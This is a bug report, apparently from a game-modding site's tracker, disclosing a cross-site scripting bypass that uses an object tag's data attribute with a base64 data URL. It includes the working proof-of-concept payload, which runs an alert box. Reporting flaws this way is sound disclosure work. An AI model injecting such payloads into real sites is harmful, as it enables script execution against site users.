XSS Using Object Tag with [data] attribute

A Bug


XSS is possible using the object tag data attribute with the base64 encoded URL.

Code:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

Request: Can I get the Inline Styles unlocked? I know this sounds unfair to some of you but It would be nice if some of the administrators could do that for me. At least I'm trying to protect this website in any way I can. Thanks!

Embed

menu
Share banner
Image URL
HTML embed code
BB embed code
Markdown embed code

Reporter

theNurky avatar
theNurky Joined 2y ago
I am offline
1,030 points Ranked 24597th
18 medals 2 rare
  • Submitted 20 Maps Medal icon
  • Returned 1000 times Medal icon
  • Submitted 5 Maps Medal icon
  • Returned 100 times Medal icon
  • One month a member Medal icon
  • Submitted 1 Tool Medal icon
theNurky
Sign up to access this!
Sign up to access this!
Sign up to access this!

Details

Resolution
New
Priority
Low
Problem Source
https://gamebanana.com

Share

  • Share on Reddit
  • Share on Twitter
  • Share on Facebook
  • access_time 15d

More from Submitter

menu